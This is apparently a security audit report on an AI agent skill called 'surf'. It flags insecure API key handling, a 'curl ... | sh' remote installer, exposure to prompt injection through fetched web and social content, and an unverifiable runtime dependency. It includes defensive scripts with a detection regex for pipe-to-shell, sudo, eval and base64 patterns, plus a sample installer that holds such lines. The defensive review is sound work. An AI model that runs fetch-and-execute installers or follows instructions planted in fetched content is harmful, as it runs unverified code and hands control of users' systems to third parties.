surf

Fail

Audited by Snyk on Apr 8, 2026

Risk Level: CRITICAL
Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 1.00). The prompt instructs the agent to accept and persist user API keys, and its examples place the secret directly on the command line (e.g., surf auth --api-key sk-xxx and export SURF_API_KEY=<your-api-key>). That requires the LLM to handle, and potentially emit verbatim, a live secret; a key passed as a command-line argument is also recorded in shell history and visible in the process list while the command runs.
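One way to keep the key out of the prompt, the command line and shell history is to read it from an owner-only file and pass it to the CLI through the environment of a single child process. The script below is an added example, not code from the surf skill or its CLI; the file path, the SURF_API_KEY variable name and the demo command are assumptions.

```shell
#!/bin/sh
# Added example, not code from the surf skill or its CLI: keep the API key out of
# argv, shell history and the model's context by reading it from a file that only
# the current user can read, and hand it to the CLI via the environment of that
# one child process. File path, variable name and the demo command are assumptions.

# secret_file_is_private FILE
# Succeeds only for a regular file with no group/other read or write bits.
secret_file_is_private() {
  f=$1
  [ -f "$f" ] || return 1
  # POSIX find: print the path if any of g+r, g+w, o+r, o+w is set (octal masks)
  exposed=$(find "$f" \( -perm -040 -o -perm -020 -o -perm -004 -o -perm -002 \) -print 2>/dev/null)
  [ -z "$exposed" ]
}

# load_api_key FILE
# Prints the key on stdout; fails (printing nothing) if the file is group- or
# world-accessible, so a caller can never proceed with a credential that is already exposed.
load_api_key() {
  f=$1
  if ! secret_file_is_private "$f"; then
    echo "refusing to read $f: must be a regular file with owner-only permissions (chmod 600)" >&2
    return 1
  fi
  key=$(cat "$f")      # command substitution strips the trailing newline
  [ -n "$key" ] || return 1
  printf '%s\n' "$key"
}

# run_with_api_key FILE CMD [ARGS...]
# The key reaches CMD only through SURF_API_KEY in its environment; it never
# appears on the command line, so it is absent from ps output and from history.
run_with_api_key() {
  f=$1
  shift
  key=$(load_api_key "$f") || return 1
  SURF_API_KEY=$key "$@"
}

# Demo with a constructed key in a temporary directory (the value is made up).
demo_dir=$(mktemp -d)
printf 'sk-demo-0000\n' > "$demo_dir/key"
chmod 600 "$demo_dir/key"
run_with_api_key "$demo_dir/key" sh -c 'echo "child sees a ${#SURF_API_KEY}-char key in its environment"'
chmod 644 "$demo_dir/key"
load_api_key "$demo_dir/key" >/dev/null || echo "loose permissions rejected, as intended"
rm -rf "$demo_dir"
```

The permission check uses octal masks with find so it behaves the same on GNU and BSD userlands; the key is only ever a value in one child's environment, never an argument.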

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 0.90). The instructions include a direct link to an install.sh script hosted on agent.asksurf.ai that is to be executed with curl ... | sh. Piping a remote script straight into a shell is a high-risk pattern: whatever that host serves at that moment runs with the agent's privileges, with no chance to inspect it or pin a known-good version, so it can execute arbitrary, potentially malicious code even if the project's API and website endpoints are legitimate.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.90). The skill explicitly fetches and ingests untrusted public content: the Domain Guide lists "web" ("Fetch/parse any URL") and "social" ("Twitter/X profiles, posts, followers"), and SKILL.md expects the agent to call those endpoints and read their API responses as part of its workflow. Those responses can carry user-generated text written to look like instructions, which may steer the agent's subsequent actions unless the fetched content is treated strictly as data.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 0.90). The setup step explicitly instructs running curl -fsSL https://agent.asksurf.ai/cli/releases/install.sh | sh, which downloads and executes remote code as a required install step. The URL is therefore a runtime external dependency that executes remote code: its contents cannot be verified from the skill text, and any change on the server, including a compromise of it, changes what the agent runs.
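The practical mitigation for both E005 and W012 is the same: download the installer to disk, verify it against a digest obtained out of band, scan it for the patterns that most often hide a second stage, and only then run it. The script below is an added example, not the surf project's installer or any code from the page; the pinned digest, the flagged patterns and the constructed sample installer are assumptions, and the demo computes its own digest only to show the flow.

```shell
#!/bin/sh
# Added example, not the surf project's installer or any code from the page:
# stage the remote install script to disk, pin its SHA-256, and scan it for
# patterns that need a human's eyes before anything executes. Replaces
# `curl -fsSL <url> | sh`. The digest you pin must come from a trusted channel
# (release notes, signed manifest); the demo below computes one only to show the flow.

# fetch_installer URL OUT : download only, HTTPS only, no execution
fetch_installer() {
  curl -fsSL --proto '=https' --tlsv1.2 -o "$2" "$1"
}

# sha256_of FILE : lowercase hex digest via whichever tool is present
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  elif command -v shasum >/dev/null 2>&1; then
    shasum -a 256 "$1" | awk '{print $1}'
  else
    openssl dgst -sha256 "$1" | awk '{print $NF}'
  fi
}

# verify_installer FILE EXPECTED_SHA256 : succeeds only on an exact (case-insensitive) match
verify_installer() {
  actual=$(sha256_of "$1" | tr 'A-F' 'a-f')
  expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
  [ -n "$actual" ] && [ "$actual" = "$expected" ]
}

# Lines worth reviewing by hand: a nested pipe-to-shell, privilege escalation,
# eval / base64 decoding (common obfuscation), or writes into a PATH directory.
RISKY_RE='(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba)?sh|(^|[^[:alnum:]_])(sudo|eval|base64[[:space:]]+(-d|--decode))([^[:alnum:]_]|$)|/usr/local/bin'

# risky_line_count FILE : number of matching lines (0 is a normal result, not an error)
risky_line_count() {
  grep -c -E "$RISKY_RE" "$1" || [ $? -eq 1 ]
}

# stage_and_check FILE EXPECTED_SHA256
# 0: digest matches and nothing flagged; 1: digest mismatch; 2: review required
stage_and_check() {
  if ! verify_installer "$1" "$2"; then
    echo "digest mismatch for $1; do not run it" >&2
    return 1
  fi
  n=$(risky_line_count "$1")
  if [ "$n" -gt 0 ]; then
    echo "$n line(s) in $1 need review before running:" >&2
    grep -n -E "$RISKY_RE" "$1" >&2
    return 2
  fi
  return 0
}

# Demo on a constructed installer (not the real install.sh) in a temp directory.
demo_dir=$(mktemp -d)
cat > "$demo_dir/install.sh" <<'EOF'
#!/bin/sh
set -e
echo "Installing surf CLI"
curl -fsSL https://example.invalid/helper.sh | sh
sudo cp surf /usr/local/bin/surf
echo done
EOF
pinned=$(sha256_of "$demo_dir/install.sh")   # in real use: from release notes, not from the download
if stage_and_check "$demo_dir/install.sh" "$pinned"; then
  echo "verified and clean: review, then run sh $demo_dir/install.sh"
else
  echo "blocked with status $?"
fi
rm -rf "$demo_dir"
```

Usage against the real URL would be fetch_installer, then stage_and_check with the digest published by the vendor, then sh on the staged file. The pattern scan is a review aid, not a verdict: a clean scan still warrants reading the script, and a flagged line is a reason to read it more carefully, not proof of malice.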

Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 8, 2026, 10:49 PM
Issues
4